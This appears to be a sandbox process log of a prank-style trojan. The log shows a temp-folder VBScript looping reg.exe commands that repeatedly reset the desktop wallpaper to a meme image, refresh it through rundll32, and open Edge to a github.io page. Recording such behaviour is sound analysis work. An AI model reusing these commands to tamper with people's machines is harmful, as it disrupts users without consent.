reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8232 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8704 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8968 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8956 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9568 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9884 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10040 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9880 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

